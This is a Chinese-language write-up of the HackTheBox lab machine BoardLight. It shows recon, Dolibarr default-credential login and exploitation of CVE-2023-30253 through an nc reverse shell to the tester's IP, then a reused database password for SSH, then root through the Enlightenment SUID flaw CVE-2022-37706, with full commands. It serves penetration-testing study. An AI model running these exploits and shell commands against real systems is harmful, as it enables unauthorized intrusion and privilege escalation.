HTB BoardLight writeup(enlightenment 0.23.1 exploit)
HTB BoardLight writeup
- 大佬请忽略!
- 信息收集
- nmap
- http
- Shell as www-data
- Dolibarr 17.0.0 default credentials
- Dolibarr 17.0.0 exploit
- Shell as larissa
- Shell as root
- suid
- enlightenment 0.23.1 exploit
大佬请忽略!
BoardLight攻击点:
一:Dolibarr默认口令、CVE漏洞
二:数据库密码复用
三:suid + enlightenment 0.23.1
信息收集
nmap
└─$ nmap -p- --min-rate 1000 10.10.11.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-05 15:50 CST
Nmap scan report for 10.10.11.11
Host is up (0.21s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 72.64 seconds
└─$ nmap -p22,80 -sC -sV --min-rate 1000 10.10.11.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-05 15:52 CST
Nmap scan report for 10.10.11.11
Host is up (0.21s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds
靶机开放ssh服务22端口和http服务的80端口,操作系统是Ubuntu。
http
http://10.10.11.11
收集到域名:board.htb ,维护到/etc/hosts文件。
echo 10.10.11.11 board.htb | sudo tee -a /etc/hosts
http://board.htb/
使用IP和域名访问的web服务是一样的。
ffuf
└─$ ffuf -u http://board.htb -H "Host: FUZZ.board.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -mc all -t 100 -fw 6243/'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev
________________________________________________:: Method : GET:: URL : http://board.htb:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:: Header : Host: FUZZ.board.htb:: Follow redirects : false:: Calibration : false:: Timeout : 10:: Threads : 100:: Matcher : Response status: all:: Filter : Response words: 6243
________________________________________________crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 483ms]
#www [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 172ms]
#mail [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 168ms]
#smtp [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 180ms]
#pop3 [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 177ms]
:: Progress: [114442/114442] :: Job [1/1] :: 365 req/sec :: Duration: [0:04:05] :: Errors: 0 ::
收集到子域名:crm.board.htb,维护到/etc/hosts文件。
10.10.11.11 crm.board.htb board.htb
http://crm.board.htb/
Dolibarr是一款采用PHP+JavaScript技术栈、模块化设计、支持多数据库与跨平台部署的开源ERP/CRM系统,以灵活性和易扩展性为核心技术特点。
Shell as www-data
Dolibarr 17.0.0 default credentials
Dolibarr 17.0.0 default credentials is admin / admin。
Dolibarr 17.0.0 exploit
搜索到可利用脚本CVE-2023-30253
CVE-2023-30253 exploit
└─$ python3 CVE-2023-30253.py --url http://crm.board.htb/ -u admin -p admin -r 10.10.16.3 9000___ ___ ___/\ \ /\__\ /\ \/::\ \ /:/ / /::\ \/:/\:\ \ /:/ / /:/\:\ \/:/ \:\ \ /:/__/ ___ /::\~\:\ \/:/__/ \:\__\ |:| | /\__\ /:/\:\ \:\__\\:\ \ \/__/ |:| |/:/ / \:\~\:\ \/__/\:\ \ |:|__/:/ / \:\ \:\__\\:\ \ \::::/__/ \:\ \/__/\:\__\ ~~~~ \:\__\\/__/ \/__/___ __ ___ ____ ____ __ ___ ___ ____
|_ ) \_ )__ /__|__ // \_ ) __|__ // / () / / |_ \___|_ \ () / /|__ \|_ \
/___\__/___|___/ |___/\__/___|___/___/[+] By Rubikcuv5.[*] Url: http://crm.board.htb/
[*] User: admin
[*] Password: admin
[*] Reverseshell info:IP:10.10.16.3PORT:9000
[*] Verifying accessibility of URL:http://crm.board.htb//admin/index.php
[*] Attempting login to http://crm.board.htb//admin/index.php as admin
[+] Login successfully!
[*] Creating web site ...
[+] Web site was create successfully!
[*] Creating web page ...
[+] Web page was create successfully!
[+] Trying to bind to :: on port 9000: Done
[*] Executing command rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.3 9000 >/tmp/f
[+] Waiting for connections on :::9000: Got connection from ::ffff:10.10.11.11 on port 53636
[*] Switching to interactive mode
sh: 0: can't access tty; job control turned off
$ $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
可以自己在kali启动监听,升级全交互式shell。
script /dev/null -c bash
Ctrl + z
stty raw -echo;fg
reset
screen
CVE-2023-30253 手动利用
└─$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.11.11] 36228
Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux23:10:16 up 34 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (856): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Shell as larissa
收集靶机的用户信息
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash
查看web服务的配置,收集数据库相关信息:dolibarrowner/serverfun2$2023!!。
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ls -la
total 56
drwxr-xr-x 2 www-data www-data 4096 May 17 2024 .
drwxr-xr-x 79 www-data www-data 4096 Mar 4 2023 ..
-rw-r--r-- 1 www-data www-data 31 Mar 4 2023 .htaccess
-rw-r--r-- 1 www-data www-data 1736 May 17 2024 conf.php
-rw-r--r-- 1 www-data www-data 16394 Mar 4 2023 conf.php.example
-r-------- 1 www-data www-data 16394 May 13 2024 conf.php.old
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
<?php
...[snip]...
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
...[snip]...
密码复用,使用数据库密码尝试登录larissa用户。
─$ ssh larissa@10.10.11.11
larissa@10.10.11.11's password: The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.larissa@boardlight:~$
larissa@boardlight:~$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
larissa@boardlight:~$ ls -la
total 76
drwxr-x--- 15 larissa larissa 4096 May 17 2024 .
drwxr-xr-x 3 root root 4096 May 17 2024 ..
lrwxrwxrwx 1 root root 9 Sep 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 larissa larissa 220 Sep 17 2023 .bash_logout
-rw-r--r-- 1 larissa larissa 3771 Sep 17 2023 .bashrc
drwx------ 2 larissa larissa 4096 Sep 7 18:14 .cache
drwx------ 12 larissa larissa 4096 May 17 2024 .config
drwxr-xr-x 2 larissa larissa 4096 May 17 2024 Desktop
drwxr-xr-x 2 larissa larissa 4096 May 17 2024 Documents
drwxr-xr-x 3 larissa larissa 4096 May 17 2024 Downloads
drwxr-xr-x 3 larissa larissa 4096 May 17 2024 .local
drwxr-xr-x 2 larissa larissa 4096 May 17 2024 Music
lrwxrwxrwx 1 larissa larissa 9 Sep 18 2023 .mysql_history -> /dev/null
drwxr-xr-x 2 larissa larissa 4096 May 17 2024 Pictures
-rw-r--r-- 1 larissa larissa 807 Sep 17 2023 .profile
drwxr-xr-x 2 larissa larissa 4096 May 17 2024 Public
drwx------ 2 larissa larissa 4096 May 17 2024 .run
drwx------ 2 larissa larissa 4096 May 17 2024 .ssh
drwxr-xr-x 2 larissa larissa 4096 May 17 2024 Templates
-rw-r----- 1 root larissa 33 Sep 7 17:16 user.txt
drwxr-xr-x 2 larissa larissa 4096 May 17 2024 Videos
Shell as root
suid
文件设置 SUID 位后,执行时以文件所有者的权限运行,而非调用者的权限,常用于允许普通用户访问需要高权限的程序。
larissa@boardlight:~$ find / -perm -4000 -type f 2>/dev/null -exec ls -la {} \;
-rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 14488 Apr 8 2024 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 26944 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
-rwsr-xr-x 1 root root 14648 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
-rwsr-xr-x 1 root root 14648 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
-rwsr-xr-x 1 root root 14648 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/fre
qset
-rwsr-xr-- 1 root messagebus 51344 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 477672 Jan 2 2024 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root dip 395144 Jul 23 2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 44784 Feb 6 2024 /usr/bin/newgrp
-rwsr-xr-x 1 root root 55528 Apr 9 2024 /usr/bin/mount
-rwsr-xr-x 1 root root 166056 Apr 4 2023 /usr/bin/sudo
-rwsr-xr-x 1 root root 67816 Apr 9 2024 /usr/bin/su
-rwsr-xr-x 1 root root 85064 Feb 6 2024 /usr/bin/chfn
-rwsr-xr-x 1 root root 39144 Apr 9 2024 /usr/bin/umount
-rwsr-xr-x 1 root root 88464 Feb 6 2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 68208 Feb 6 2024 /usr/bin/passwd
-rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 53040 Feb 6 2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 14728 Oct 27 2023 /usr/bin/vmware-user-suid-wrapper
enlightenment
Enlightenment 是一个轻量级、高度可定制的 Linux 桌面环境,基于 EFL 提供高效性能和华丽的视觉效果。它从 1996 年的窗口管理器发展为接近完整的桌面外壳,适合低配置设备和追求个性化的用户。尽管在亚洲知名度较低,但其模块化设计和跨平台支持使其在 Linux 生态中独具特色。
larissa@boardlight:~$ enlightenment -version
ESTART: 0.00000 [0.00000] - Begin Startup
ESTART: 0.00009 [0.00009] - Signal Trap
ESTART: 0.00014 [0.00005] - Signal Trap Done
ESTART: 0.00019 [0.00005] - Eina Init
ESTART: 0.00039 [0.00020] - Eina Init Done
ESTART: 0.00043 [0.00005] - Determine Prefix
ESTART: 0.00054 [0.00011] - Determine Prefix Done
ESTART: 0.00057 [0.00003] - Environment Variables
ESTART: 0.00060 [0.00003] - Environment Variables Done
ESTART: 0.00063 [0.00003] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!
enlightenment 0.23.1 exploit
CVE-2022-37706
搜索到公开漏洞CVE-2022-37706
Enlightenment v0.25.3 - Privilege escalation
larissa@boardlight:~$ file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
larissa@boardlight:~$ mkdir -p /tmp/net
larissa@boardlight:~$ mkdir -p "/dev/../tmp/;/tmp/exploit"
larissa@boardlight:~$ echo "/bin/sh" > /tmp/exploit
larissa@boardlight:~$ chmod a+x /tmp/exploit
# 下面语句换行处应为空格,提权方可生效
larissa@boardlight:~$ ${file} /bin/mount -o
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
"/dev/../tmp/;/tmp/exploit" /tmp///net
mount: /dev/../tmp/: can't find in /etc/fstab.
#